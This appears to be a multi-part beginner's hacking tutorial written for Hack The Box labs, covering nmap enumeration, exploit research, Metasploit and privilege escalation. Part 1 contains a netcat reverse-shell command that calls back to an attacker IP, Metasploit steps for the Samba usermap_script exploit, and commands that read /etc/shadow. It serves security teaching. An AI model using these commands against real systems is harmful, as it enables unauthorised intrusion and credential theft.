/README.md:

---
description: >-
  This is a written guide for learning how to hack. We call it Practical
  Hacking!
---

# Introduction

### About Practical Hacking

Practical Hacking is a four-part guide to learning how to hack computers, where each part has a specific subject. The details are outlined at the bottom of this article. If something in the guide is unclear, notify us so we can improve it. We are not afraid of criticism, nor comments!

### Who are we?

Two humble pentesters from Norway. We like to talk and write a lot about security and hacking. And we both love to share our knowledge!
![chryzsh](.gitbook/assets/brainmachine003_schem2.jpg)

![Infernux](.gitbook/assets/forrest-gump-running-photo-interesting-forrest-gump-beards-pinterest-of-forrest-gump-running-photo.jpg)

### **Hacking vs Penetration testing**

This guide is purposefully devoid of the words "penetration testing"; we only refer to what we teach as "hacking". Although the guide covers a general approach, techniques and numerous tools used in penetration testing, we are hesitant to call it that, simply because penetration testing covers a much wider area that includes scoping, reporting and threat modeling. This guide is merely a basic practical introduction to some of the aspects involved in penetration testing.

The Penetration Testing Execution Standard (PTES) defines penetration testing as 7 phases:

* Pre-engagement Interactions
* **Intelligence Gathering**
* Threat Modeling
* **Vulnerability Analysis**
* **Exploitation**
* **Post Exploitation**
* Reporting

Safe to say, this guide only involves the activities marked in bold, as we won't teach anybody how to write a report. The basics of hacking, however, shall be taught thoroughly.

### [**Hack The Box**](https://www.youtube.com/watch?v=CxtMMgqfXY8)

![](.gitbook/assets/logo-final-whitebg.png)

The guide is based on using a well-renowned platform called Hack The Box (HTB) to practice the acquired skills. HTB has gained vast popularity in the hacker community and now has more than 70 different machines. If machines in the course are for some reason unavailable or retired, there are usually alternatives in the active machines category of HTB that cover the same subjects.

There are two categories of machines at the moment, Active and Retired. The former are machines available with a Free subscription. The latter are available with a VIP subscription.
Most of the machines mentioned in this guide are available either through the free or the VIP labs.

HTB is an excellent platform for such training, and in the courses we have held we have provided assistance in hacking boxes and occasionally done walkthroughs once everybody has finished a box. However, because this is an Internet-accessible article series, we can't provide any written solutions to boxes. We do however try to provide you with all the information and tools required to figure out how to hack these boxes on your own. If you require further assistance, check out the social channel listed in the [Preparation](preparation.md) part of this guide.

## Hacking in four parts

To get you started we have broken this guide into four major parts and some preparation stages.

### Preparation

Gets you set up with a Kali Linux virtual machine for hacking and registered on Hackthebox, the platform we will use to practice our hacking skills.

### Before you start

Some words of caution and tips on hacking as efficiently as possible.

### **Part 1 - How to hack**

A methodical approach to hacking individual boxes, mostly by using automatic tools.

### **Part 2 - Hacking manually**

Taking the step beyond automatic tools to get an understanding of what hacking really is.

### **Part 3 - Web hacking**

Introduction to the vast world of web hacking.

### **Part 4 - Privilege escalation**

Goes deeper into the subject of escalating privileges.

![](.gitbook/assets/image%20%2855%29.png)

{% hint style="warning" %}
This is not 'Nam, this is hacking. There are rules.

_Don't be a dumbass!_

Don't try to hack your employer, newspaper, school or anyone else. Don't launch any random tools you find on the internet. Don't execute commands if you don't know what they do.

Do, however, practice the things you learn in this course in a fantastic lab environment such as Hackthebox.
{% endhint %}

![](https://lh3.googleusercontent.com/UQNc-yalPl6TPNKbxfVFDBfjsHmILD38J5FaWfcdgrlimdO_2u2C98npBMSuxw0uRYP7DIdLPxS0hosnCI9ZwVeT9APu6ivvWT_1T-h2SPfNOwOKKre74f2u30R8aEZQPrLUns5n1Sk)

/SUMMARY.md:

# Table of contents

* [Introduction](README.md)
* [Preparation](preparation.md)
* [Before you start](before-you-start.md)
* [Part 1 - How to hack](part-1-how-to-hack.md)
* [Part 2 - Hacking manually](part-2-hacking-manually.md)
* [Part 3 - Web hacking](part-3-web-hacking.md)
* [Part 4 - Privilege escalation](part-4-privilege-escalation.md)
* [What now?](what-now.md)

/before-you-start.md:

---
description: Some basics that are important to know before you start hacking
---

# Before you start

## **Note taking**

Before we begin hacking, we wish to emphasise the importance of taking notes. You are going to have a hard time when you try to go back to boxes after 6 months and discover you didn't even bother to jot down the IP address of the machine. You won't remember what you did, and you won't remember the exact commands you used. We have all done this, numerous times, and it's the same every time. There is a huge gap in skill level and satisfaction between those that start taking notes from the beginning and those that don't.

We know taking notes is boring. Because who reads their notes anyway, right? But trust us on this!
Even if you have excellent photographic memory, you want to be able to just copypaste your notes over to a buddy that wants to know how you did it or maybe make a beautiful looking writeup to show off to your hacker friends. 12 | 13 | We won't force any specific note taking tool upon you, so if you want to use notepad.exe we're cool with that. Finding a good structure and workflow is the most important thing. Try not to let note taking distract you from the creative process of hacking. It's easy to get caught up in formatting and organizing notes, so try to avoid that. Note taking is already boring, don't make it even more boring and time consuming. Just write down the essentials in any form you like and then spend time after you have rooted the box to format and make it neat for later. 14 | 15 | ### **Tips from chryzsh** 16 | 17 | I \(chryzsh\) have recently adopted a method where I write in prosaic form what I did for each command in my notes. I also record every single command by copy-pasting it into my notes. When I'm done with a box I try to make a little write-up for myself. This makes it easier to reference later, especially if the notes are full of scan results from different tools. 18 | 19 | For the time being I use VScode with something as plain as txt files in a very simple folder structure saved to a directory in Google Drive. I give the files names on their last octet of the IP address on HTB. Example: `Google Drive/Hacking/labs/htb/75-nibbles.txt` 20 | 21 | You are of course free to take notes however you like! 22 | 23 | ### **Tips from Infernux** 24 | 25 | I've been using OneNote since the beginning, organizing my files like this: 26 | 27 | ![Example OneNote layout](.gitbook/assets/image%20%2831%29.png) 28 | 29 | It's also a good idea to create a folder for HTB and making a new folder for each machine, putting all the files you use \(scripts, shells, etc\) in that folder, to keep it organized. 
If you start out being organized it'll help you down the road. You'll always go back to your notes and scripts! 30 | 31 | ### TLDR note taking 32 | 33 | Make a new notes file for each box. When you are hacking, put all these things in the file continuously: 34 | 35 | * Scan results 36 | * Commands you used 37 | * Important findings 38 | * Exploit and vulnerability links 39 | * Code snippets 40 | * Flags 41 | 42 | ### Tips 43 | 44 | * Keepnote is built in to Kali if you want to take notes there 45 | * OneNote is a popular tool for organized note-taking 46 | * Take backups of your notes \(Kind of boring\) 47 | * Review your notes after each box and do some basic formatting \(Boring\) 48 | * Make an additional document / note with useful commands and tricks \(super important\) 49 | 50 | -------------------------------------------------------------------------------- /part-1-how-to-hack.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | The first part is a general introduction in the method that is hacking 4 | individual machines. How do we hackers go from no access to full access? 5 | --- 6 | 7 | # Part 1 - How to hack 8 | 9 | ## What do you learn in this part? 10 | 11 | * What is hacking? 12 | * Four steps involved in hacking machines 13 | * Using Metasploit to hack 14 | * Hacking an actual machine! 15 | 16 | **Boxes on HTB that are suitable for this part** 17 | 18 | * Lame - 10.10.10.3 19 | * Blue - 10.10.10.40 20 | 21 | **If you are looking for a challenge** 22 | 23 | * Granny 24 | * Grandpa 25 | * Legacy 26 | * Optimum 27 | 28 | ## Using Hackthebox 29 | 30 | In case you decided to skip the preparation stages, [Hackthebox](https://www.hackthebox.eu/invite) is the platform we will be using in this guide to allow you to practice your hacking skills. 31 | 32 | Hacking machines on Hackthebox is somewhat similar to hacking in the real world. 
The HTB lab consiats of a number of independent boxes that are not connected to each other. That means each machine must be hacked individually. **The main goal of "hacking" is to gain command line / terminal access to the target machine with the highest privilege possible**. We usually achieve some form of command line access to target through what is called "code execution". That means you have found a way to execute arbitrary code on the target and hence you can start taking control over it. 33 | 34 | Usually, you gain access as a user or service account. The next challenge then becomes to escalate your privileges to the highest possible level. That means, if you are a regular user or a service account, you want to become administrator. Another flag is made available only through access with this level of privilege. 35 | 36 | For each machine there is a flag that proves you have gained access to the machine, regardless of privilege. There are two flags: **user.txt** and **root.txt**. Getting access to the machine as a regular user gives you the user flag, while getting access as `root` or `Administrator` access gives you both flags. The flags are simply unqiue MD5 strings that looks something like this:`bb1d10195b0a54e350cg015009a8095y` 37 | 38 | #### Submitting flags on Hackthebox 39 | 40 | After you have successfully compromised and gained access to a box, and found the flags, they must be submitted by pressing the two icons on the right in the machines panel on HTB. Flags provde that you completed the box and for each flag you get a certain number of points, depending on the difficulty of the machine. Some boxes are built in such a way that compromising them might give you administrative access straight away. If so, you can grab both flags, because with administrative privileges we have full access to everything on the machine. 
![The two rightmost buttons on each machine open a flag submission panel](.gitbook/assets/image%20%2811%29.png)

Depending on whether the operating system is Windows or Linux, the flags on the machines are usually located in the places listed below. The `<user>` is the username of the user on the machine, which is different on all the boxes. The Administrator user is usually not renamed, but it can happen that flags are hidden, so beware.

**Windows**

* `C:\Documents and Settings\<user>\Desktop\user.txt`
* `C:\Documents and Settings\Administrator\Desktop\root.txt`

**Linux**

* `/home/<user>/user.txt`
* `/root/root.txt`

## How to hack

This is a highly simplified approach to hacking individual boxes with four major steps that are explained in further detail below.

1. **Enumeration**
2. **Vulnerability analysis**
3. **Exploitation**
4. **Privilege escalation**

## **1 - Enumeration**

**Goal** - Gather information about the target

**Tools** - Nmap, web browser

**First things first -** Read carefully and write down everything you see on the screen. This may sound a bit weird, but we truly want you to write down any name, software, technology, email address or unknown factor that you discover when hacking. **The devil is in the detail**. The fact that you did not write down the name of that piece of software may lead you to an abrupt halt later down the road.

### **Find IP address, open ports and services**

First, we want to find the IP address of the target. Since we are using HTB as a platform this is given in the left pane under _Machines_.

To discover ports, services and sometimes even the operating system we use the tool called `nmap`. It is a very powerful port scanner that will help us a lot. The basic syntax for nmap is:

`nmap <ip>` - scans the provided IP address for open TCP ports.
`nmap -A -n <ip>` - same as above. Additionally, the **-A** option enables OS and version detection, script scanning and traceroute. The **-n** option prevents nmap from performing DNS resolution, which makes the scan go slightly faster.

### How to read `nmap` results

```text
nmap -A -n 64.13.134.52
```

```text
Nmap scan report for 64.13.134.52
Host is up (0.045s latency).
Not shown: 993 filtered ports
PORT      STATE  SERVICE VERSION
22/tcp    open   ssh     OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 1024 60:ac:4d:51:b1:cd:85:09:12:16:92:76:1d:5d:27:6e (DSA)
|_2048 2c:22:75:60:4b:c3:3b:18:a2:97:2c:96:7e:28:dc:dd (RSA)
25/tcp    closed smtp
53/tcp    open   domain
70/tcp    closed gopher
80/tcp    open   http    Apache httpd 2.2.3 ((CentOS))
|_html-title: Go ahead and ScanMe!
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
113/tcp   closed auth
31337/tcp closed Elite
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.13 - 2.6.31, Linux 2.6.18
Network Distance: 13 hops
TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
[Cut first 10 hops for brevity]
11  80.33 ms  layer42.car2.sanjose2.level3.net (4.59.4.78)
12  137.52 ms xe6-2.core1.svk.layer42.net (69.36.239.221)
13  44.15 ms  scanme.nmap.org (64.13.134.52)
Nmap done: 1 IP address (1 host up) scanned in 22.19 seconds
```

This is a pretty regular nmap scan. The output can look a bit daunting at first, but it gets easier once you are used to reading nmap output. The result of this scan reveals that some ports are open. Each line that starts with a number indicates a port that nmap has identified, together with its status. Here you can see a mix of open and closed ports, and naturally we want to focus on those that are open.
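As an added example that is not part of the original guide, here is a small Python parser that turns nmap output like the scan above into a structured list of open ports, detected versions and NSE script findings, which are exactly the facts you want in your notes and in the vulnerability research of step 2. The sample input is the scanme.nmap.org scan shown above embedded as a constructed string (traceroute section left out); the function and class names are our own.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample input: the scanme.nmap.org scan shown above, with the
# traceroute section omitted (column spacing is approximate).
SAMPLE_SCAN = """\
Nmap scan report for 64.13.134.52
Host is up (0.045s latency).
Not shown: 993 filtered ports
PORT      STATE  SERVICE VERSION
22/tcp    open   ssh     OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 1024 60:ac:4d:51:b1:cd:85:09:12:16:92:76:1d:5d:27:6e (DSA)
|_2048 2c:22:75:60:4b:c3:3b:18:a2:97:2c:96:7e:28:dc:dd (RSA)
25/tcp    closed smtp
53/tcp    open   domain
70/tcp    closed gopher
80/tcp    open   http    Apache httpd 2.2.3 ((CentOS))
|_html-title: Go ahead and ScanMe!
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
113/tcp   closed auth
31337/tcp closed Elite
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.13 - 2.6.31, Linux 2.6.18
Network Distance: 13 hops
Nmap done: 1 IP address (1 host up) scanned in 22.19 seconds
"""

# The common port-to-service associations listed in the text.
COMMON_PORTS = {20: "FTP", 21: "FTP", 22: "SSH", 80: "HTTP(S)",
                443: "HTTP(S)", 139: "SMB", 445: "SMB"}

# Matches a "PORT STATE SERVICE VERSION" row, e.g.
# "22/tcp    open   ssh     OpenSSH 4.3 (protocol 2.0)"; VERSION is optional.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.+))?$")


@dataclass
class PortResult:
    port: int
    proto: str
    state: str
    service: str
    version: Optional[str] = None
    scripts: List[str] = field(default_factory=list)  # NSE output for this port


@dataclass
class HostResult:
    address: Optional[str] = None
    os_details: Optional[str] = None
    ports: List[PortResult] = field(default_factory=list)


def parse_nmap(text: str) -> HostResult:
    """Parse normal nmap output (what you see on the terminal) into a HostResult."""
    host = HostResult()
    current = None  # the port that following "|" script lines belong to
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PORT_RE.match(line)
        if m:
            current = PortResult(int(m.group(1)), m.group(2), m.group(3),
                                 m.group(4), m.group(5))
            host.ports.append(current)
        elif line.startswith("|") and current is not None:
            # NSE script output is printed directly under the port it ran against.
            current.scripts.append(line.lstrip("|_ ").strip())
        elif line.startswith("Nmap scan report for "):
            host.address = line[len("Nmap scan report for "):].strip()
        elif line.startswith("OS details:"):
            host.os_details = line.split(":", 1)[1].strip()
        else:
            current = None  # any other line ends the current port's script block
    return host


def open_ports(host: HostResult) -> List[PortResult]:
    """Only open ports matter for the next step; closed/filtered ones are noise."""
    return [p for p in host.ports if p.state == "open"]


def versions_to_research(host: HostResult) -> List[tuple]:
    """(port, service, version) for each open port where nmap identified a
    version: these are the strings to plug into a search engine in step 2."""
    return [(p.port, p.service, p.version) for p in open_ports(host) if p.version]


def summarize(host: HostResult) -> List[str]:
    """One note-taking line per open port, plus any NSE findings under it."""
    lines = [f"Target: {host.address}  OS guess: {host.os_details or 'unknown'}"]
    for p in open_ports(host):
        label = COMMON_PORTS.get(p.port, "?")
        lines.append(f"{p.port}/{p.proto} {p.service} [{label}] {p.version or '(no version)'}")
        lines.extend(f"    nse: {s}" for s in p.scripts)
    return lines


if __name__ == "__main__":
    print("\n".join(summarize(parse_nmap(SAMPLE_SCAN))))
```

Paste the output of your own `nmap -A -n <ip>` run into `parse_nmap` and the summary is ready to drop straight into the notes file for that box.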
In the beginning, these ports may not mean that much to you. Most ports are connected to a service, and it is usually the same port connected to the same service, but not always. Below are some very common port-to-service associations that you will see. Only by hacking more boxes will you start recognizing services and know which ones are more likely targets than others.

* FTP - 20, 21
* SSH - 22
* HTTP\(S\) - 80, 443
* SMB - 139, 445

You want to learn as much as possible about the target and its services. If you can figure out version numbers, operating system, specific protocols, then all this is highly relevant information for you as a hacker. As you can see from the results above, ports 22, 53 and 80 are open. That means we have SSH \(22\), a DNS server \(53\) and a web server \(80\).

**What now? -** Try to use `nmap` to discover open ports and services on your target

## **2 - Vulnerability analysis**

**Goal** - Detect vulnerabilities in services or applications running on the target

**Tools** - Google, searchsploit, CVE-details, Rapid7, Exploit-DB

### Finding vulnerabilities and exploits

Now that we know what ports are open and what services these ports signify, let's try to see if any of them have public vulnerabilities and/or exploits.

As an example, let's have a look at the very famous EternalBlue vulnerability and exploit, named MS17-010. We will have a look at some common internet sources to learn more about this.

#### CVE-Details

CVE is a system for categorizing and scoring the severity of vulnerabilities. The website CVE-details provides us with this information. This is what the EternalBlue vulnerability looks like on CVE-details. As you can see it has quite a high CVSS score, which usually means it can be easily exploited. Also, there are direct links to Metasploit modules, which is a good sign. That means there are prepared exploits for it available for you to use. Metasploit is a framework that contains tools for very easy hacking of machines. We are getting into Metasploit very soon, so just keep reading.

![CVE-details for MS17-010, also known as EternalBlue](https://lh3.googleusercontent.com/v0mes2e-SCdJ45hLaJLpbbIykdTHGn2orgOJ58Xw9-IAmaBXD4cQgJgoLdyS5D_iZ5zddMD-Fl2mYpF-ORWIrV-JQgEDRuA4auKUoY3sNI5ljr6UgeyF67vPAwiehnl7OyUQXK2jUsM)

#### Rapid7

Rapid7 is the company that has written the Metasploit modules for thousands of exploits over the years, preparing them into a framework that is super easy to use. If you stumble upon an exploit and it has an associated Metasploit module you can rest assured it's been tested and is legit. Here we can see how MS17-010 looks on Rapid7's own site. You may not understand the actual details of the exploit. Don't worry! Very few do, and you will soon discover it is possible to hack without understanding every single detail.

![Rapid7 Metasploit module for MS17-010](https://lh3.googleusercontent.com/e3inunv4NBLXBlcP-LgDfEuTSpmRWEAoPlnM08CiA-jHPIDVccVIf2Q8JkcxDQocKw6eiMUvkP5RLREzpPXt_DAcpsB6Dxv9rRU3pM9hvQnXrWP2kexxDNC7x5vTSl3Y1uV1b5RIOic)

#### Exploit-DB

Let's go back to CVE-details and have a look at the manual exploit. Sometimes, a Metasploit module is not necessarily the best choice and as a hacker you should strive to try exploiting boxes using both manual and automatic tools.

![Original exploit for MS17-010 on Exploit-DB](https://lh6.googleusercontent.com/hTd9RIUcQxb0qalEJG0R9ZoeLmM-i9-vKXrSB0dyUV1arnK1Q9oTOhkiiXrvHhn6L8eOyi_6WWmkhTxVR-iTZ4a7ozO8Ngq6QA2CziPfu5sYvw8tGlYOlOCrmTik1aPOqXFmwKxkW78)

Here you can see the original exploit code. You can download and run it as you please. It has a link back to the original CVE on CVE-details and it has been verified by the Exploit-DB team.

#### Reviewing the information

Finding vulnerabilities and exploits is generally easy, as most of it is pretty well documented online. It is extremely rare that we have to discover vulnerabilities ourselves. A very simple approach to discovering vulnerabilities is to plug the name of the service and its version into your favorite search engine with the word "exploit" or "vulnerability" after it and see if anything shows up. Then review that information. See below for a simple example.

![A simple example of a google search for a service with a version number](.gitbook/assets/image%20%2856%29.png)

Perhaps the most important thing when assessing whether a service or box is vulnerable to something is to check whether the service version matches. Very often you will see that certain vulnerabilities and exploits only work on specific versions, and if the version on your target does not match, well then you can still try it, but often you will be shit out of luck. If that happens, you can try moving on to researching another service, or do more research to see if you can find something a bit rarer.

**What now?** - Try to find a vulnerability and an exploit that matches the service version you have identified.

## **3 - Exploitation**

**Goal -** Delivering a payload

**Tools -** Metasploit

In this step we have enumerated a target, we have found an open port with a vulnerable service and we're hoping to exploit it. That means our goal is executing commands on the target. So how do we get command execution or, as we sometimes say, deliver a payload?

### **What is a payload?**

Before we move on it's important to know what a payload is. The payload is the actual information in a transmission; in our case it's a script that will provide us with some sort of reverse shell on the target.

Your payload is quite simply whatever code you decide to execute on the machine. It can be something simple or it can be advanced. However, as we are hackers we want to take full advantage of the fact that we can execute commands on the target. So what we want to do is: **make the target machine connect back to our machine to get what we call a 'shell'.** Why do we want to do this? Because, when we have command execution on the remote box we can execute commands to make it connect back to us. However, the other way won't work because it's not configured to accept a connection to establish a shell. Therefore in the illustration below, what's called a "normal shell" isn't possible, but since we control the 'client' part, which is our Kali box, we can open a port and make the server/target machine connect back. This way, we establish a connection where we can interact with the target.

To read more about payloads, visit:

[https://github.com/rapid7/metasploit-framework/wiki/How-payloads-work](https://github.com/rapid7/metasploit-framework/wiki/How-payloads-work)

### **So, what's a reverse shell?**

A reverse shell is the target host connecting back to our host! It sounds weird, but that's what we use the exploit for: we get past the defenses of the target host to deliver our payload - malicious code that leverages tools already on the system to connect back to our Kali Linux box. So how do we know that the target host is connecting back? How do we "catch" our shell?
![Reverse shell vs bind shell \(normal shell\)](https://lh4.googleusercontent.com/_u5bfPsl_tFbfHvQztajcQg9Xej7SOu7y3Cu3RTBJ5RGDzZAUQdt474UFHeN4_MOmbiO1iiPbDiHnU_NmuZIaHhwjFr-HLVic23LhqiaXElqS8oNh_vDkRw3cwOkcgmNYUn1-n1BiWg)

### **The art of listening**

An important concept in the world of hacking is listeners. Whenever we execute a payload, either through the Metasploit Framework \(MSF\) or manually, we need to listen for our shell to call back. We can do this in several ways, and perhaps the most common and simple way is using a tool called `netcat`, or `nc` for short. `nc` is a program used for reading from and writing to network connections, often called sockets. In the picture below we illustrate this. Let's imagine that we have successfully delivered a payload to the target that runs the following command:

```text
nc 10.10.14.18 4444 -e /bin/sh
```

This executes netcat and connects to the IP address 10.10.14.18 on port 4444, executing `/bin/sh` - one of the many shells on a Linux system. If we did this without a listener nothing would happen. We need something listening on our host with IP 10.10.14.18 on port 4444. For this we use the following command:

```text
nc -lvp 4444
```

The -l is for listen, -v is for verbose and the -p is for port. This command starts a listener on your Kali machine on port 4444. Whenever the payload tries to connect to your IP address on this port with `nc` or a payload, it will "catch" the shell and you will get a terminal on the target. From there you are able to execute commands on the target. See the figure below for a basic example of how this works.
![Basic reverse shell and listener example](.gitbook/assets/image%20%2850%29.png)

**Metasploit Framework \(MSF\)**

As mentioned, the Metasploit framework, and namely the msfconsole, is a powerful tool that comes with premade exploits for many vulnerabilities.

Metasploit is in fact not only a tool, but a powerful framework. It is a tool that makes it very easy to get into hacking, but you will soon discover its limitations too and realize that hacking requires more than just entering an IP address into a console and pressing enter.

Starting the console loads Metasploit with its huge library of different payloads, exploits and fancy modules. MSF has a few different concepts that we need to be aware of:

* Listener - listen for an incoming connection
* Payload - executing commands on the target
* Meterpreter - important tools in MSF
* Use the help and search commands

To start the tool type the following into your terminal:

```text
systemctl start postgresql
msfdb init
msfconsole
```

The above commands will start the postgresql service, initialize the database and start the console itself. However, this is only necessary the first time you start it. Usually you can open the Metasploit console with:

```text
msfconsole
```

Inside the console you have a lot of options, but let's continue trying to use the EternalBlue exploit we looked at in the earlier steps.

To search for exploits, use the search command:

```text
search EternalBlue
```

You can also specify more parameters if you want, like NAME, TYPE and PLATFORM.
```text
msf > search name:smb type:exploit platform:windows
```

**So, how do I choose the right exploit?**

Choosing the right exploit can be hard or easy - sometimes your searches will display a ton of results, sometimes none. The approach to sorting through many results is based on two parameters, assuming you've searched for only exploits - namely RANK and DISCLOSURE DATE. We want to try the exploits that are newest and that rank highest \(excellent being the highest\). Sometimes you'll end up trying them all and none will work - enumerate more!

**Modifying the exploits**

So you've searched and found an exploit - but we're not ready yet. First we need to select our exploit, like so:

```text
msf> use exploit/multi/samba/usermap_script
```

With the exploit selected we can look at and modify its options, like so:

```text
msf (exploit/multi/samba/usermap_script) > show options
```

This will display something like this:

![Example of the options in a payload](https://blobscdn.gitbook.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-LFWUjrWK-mc9zb5bbso%2F-LFgdoqNXAT6sDzPzLek%2F-LFgikUbRDXn6qLJtIBi%2Fe5f4c786-4709-4d66-bb9f-e605f788bc37.png?alt=media&token=37b6319f-61c7-49dd-8ea5-50aa830fe79d)

Name lists the parameters that can be set, Current Setting shows you what they're currently set to and Required shows you what needs to be set. Usually these exploits show up with the right port, but sometimes it has to be modified. Look at the enumeration you did - if the webserver is on port 5000, then your exploit targeting the webserver needs to be on port 5000.

In the example above RPORT is set correctly to 139, but we need to set the RHOST ourselves. This is our target, so we supply the IP of the target:

```text
msf exploit(usermap_script) > set rhost 10.10.10.3
```

We also need to tell MSF some more things - what payload to use, what port to listen on and what IP address it should connect back to. This is the same as the example used above. The MSF exploit module will deliver the payload, but you need to supply it with the listener IP and PORT. To set this, do the following:

```text
msf exploit(usermap_script) > set LHOST 10.10.14.18
lhost => 10.10.14.18
```

We can also use tun0 for our LHOST \(this is the VPN adapter connected to HackTheBox in this case\):

```text
msf exploit(usermap_script) > set LHOST tun0
lhost => tun0
```

Then we need to tell it what port to listen on. An important point here is that we should try to use a port that isn't already in use to avoid problems. 4444 is such a port:

```text
msf exploit(usermap_script) > set LPORT 4444
lport => 4444
```

Usually these exploit modules come with a premade payload, but we can also modify the payload. This, however, is something we will get more into when we get to part 2.

**Conclusion:** Look for ways to upload files and/or execute commands on the target

## **4 - Privilege escalation**

**Goal:** Becoming a root / Administrator user

**Tools:** Mad hacker skills

### I have a shell, what now?

This is the time to start a new round of enumeration. You need to figure out where you are on a machine, who you are, and start working out a way to escalate your privileges. In certain cases it might not even be necessary, because you are already Administrator. The list below is not exhaustive by any means and you will find more details about this subject in [Part 4 - Privilege escalation](part-4-privilege-escalation.md).
The `whoami` command displays what user you have access as.

```text
whoami
root
```

The `id` command shows what user and group id you have, in addition to what groups you are a member of.

```text
id
uid=0(root) gid=0(wheel)
```

The `pwd` command identifies the working directory. That means, where you are located now.

```text
pwd
/home/chris
```

So how does this help us to escalate our privileges? It might not directly, but it tells us who we are. If we're already root, job done. If not, we've got work to do. Privilege escalation is more enumeration, but with different tools than we use for scanning the host.

**What are we looking for?**

First and foremost, we want to find out as much about the target system as possible. This will vary based on the target's operating system, but there are some common denominators, such as:

* What version is the operating system running?
* Which services are running?
* Any scheduled tasks?
* What programs are installed?
* What users exist?
* Anything out of the ordinary?

**Linux privilege escalation**

First things first. There are some things you should ALWAYS try. We can tell you one thing, but most of these things you'll learn as you go. Maybe the way to root is just one command? Well, next time you'll remember. One thing you need to do is check what commands you can run as sudo \(root\).

```text
sudo -l
```

How do we find what operating system is running?
```text
cat /etc/issue
cat /proc/version
```

To list running processes and services, do:

```text
ps aux
```

To list all installed applications:

```text
ls -alh /usr/bin/
ls -alh /usr/sbin/
```

Scheduled tasks on Linux are called cron jobs, and we can view them by looking at the crontab. There are a bunch of different places these hide depending on the flavor of Linux, but they should all be located somewhere under the /etc/ folder.

```text
crontab -l
ls -al /etc/ | grep cron
cat /etc/cron*
cat /etc/crontab
```

When we want to find out more about what groups and users exist on Linux we can look in the /etc/ folder at the passwd and group files. We can also try to look at the shadow file \(this is where the password hashes are stored, not in the passwd ... I know, makes sense\)

```text
cat /etc/passwd
cat /etc/group
cat /etc/shadow
```

Finding anything out of the ordinary requires you to have experience. If you look at 100 targets, then anomalies in each one will start to appear more obvious, but you might miss these things now. Don't worry, that's what friends are for! One thing you will hear a lot of in this game is "try harder", but there's something to be said for trying smarter. Try as hard as you can on your own, but know when you're lost, and ask for help.

Finally, the go-to guide for privilege escalation on Linux is the very famous [g0tmi1k's guide](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/).

**Windows privilege escalation**

Now, Windows priv esc is somewhat different from Linux. Usually we use the Metasploit Framework and something called ["Local Exploit Suggester"](https://www.rapid7.com/db/modules/post/multi/recon/local_exploit_suggester). Using this is as simple as loading it and pointing it to the session. In this example we have a meterpreter shell and it's designated as session 1.

```text
msf > use post/multi/recon/local_exploit_suggester
msf post(local_exploit_suggester) > set session 1
msf post(local_exploit_suggester) > run
```

And that's it. This will show us a list of Metasploit exploits that can be used to escalate our privileges. **For more, read [this article](https://zero-day.io/windows-privilege-escalation-exploit-suggester/).**

Now, sometimes we have to get manual. To find info on the operating system, run:

```text
systeminfo
```

To find other users we can use either a net command or look in the `C:\Users` directory.

```text
net users
dir /b /ad "C:\Users\"
```

To find groups and administrators we can also use net.

```text
net localgroup
net localgroup Administrators
```

To find installed software we can look in the software folders or the registry.

```text
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE
```

To see what's running \(processes or services\):

```text
tasklist /svc
tasklist /v
net start
sc query
```

Finally, to find scheduled tasks we can do one of the following:

```text
schtasks /query /fo LIST 2>nul | findstr TaskName
dir C:\windows\tasks
```

**For more, read absolomb's excellent [Windows Privilege Escalation Guide](https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/).**

That's it for now. We're getting deeper into privilege escalation in part 4. Remember, what we are doing now is enumerating more! We're looking for misconfigurations, unpatched or insecure programs, services or folders. Anything that looks weird - poke it! Be curious. And when all else fails, ask the social channel.

## Start hacking boxes

If you've read the above you should be able to at least start trying to hack some machines on HTB. We recommend you start off with some of the "easy" ones, and depending on your skill level this might still be very hard. The following boxes should be suitable for this level:

* Lame - 10.10.10.3
* Legacy - 10.10.10.4
* Blue - 10.10.10.40

You can reset a box through the Machines panel if somebody clutters it or if something is obviously wrong with it.

## **Useful commands**

* `nmap <ip>` - scan IP for open ports
* `nmap -A -n <ip>` - scan IP and services for more info \(slower\)
* `searchsploit <search term>` - search for exploits in the offline exploit database
* `msfconsole` - open the Metasploit console
* `whoami` - display what user you are currently logged in as
* `id` - display your user and group ID \(uid/gid\)
* `pwd` - display where you are
* `systeminfo` - display system info on Windows

## **I still have no idea where to start**

**Don't worry!** This is normal. Information overload is common when learning many new things at once. Try to break everything down into baby steps so it doesn't seem so overwhelming.
* Start with the IP address you got from HTB and check what operating system the machine is
* Use `nmap` to find open ports
* Look up the services that nmap gives you on the internet
* Try to think: _What am I looking for?_
* Try to think: _Is this something I should look closer at?_
* Google the words you see on the screen

If you still struggle with the above to the extent where you can't even figure out what to do at all, **don't worry.** **Hacking is difficult!** We recommend you take a step back and check out some of the hacking challenges from Overthewire. [Bandit](http://overthewire.org/wargames/bandit/), which is oriented around basic Linux commands, is a very good place to start. Once you have at least a few of those down, you should feel slightly more comfortable with some of the concepts taught in this guide.

## I got started, but now I’m stuck

* Start from the beginning
* Fully enumerate
* Think like a user, then like a hacker
* admin admin
* Google everything
* Take a break and come back to it
* Try smarter
* Ask another hacker
* Look up the machine on the [HTB forum](https://forum.hackthebox.eu/)
* Ask us

Happy hacking!

--------------------------------------------------------------------------------
/part-2-hacking-manually.md:
--------------------------------------------------------------------------------

---
description: >-
  Take your hacking skills beyond automatic tools like Metasploit, to understand
  what hacking is really about.
---

# Part 2 - Hacking manually

## What do you learn in this part?

* Hacking manually with the Metasploit framework
* Linux terminal tricks
* Nmap options and scripts
* Credential abuse
* Privilege escalation
* Hacking more boxes!
**Boxes that are suitable for this part**

* Devel - 10.10.10.5
* Mirai - 10.10.10.48

**Other relevant boxes**

* Blocky
* Optimum

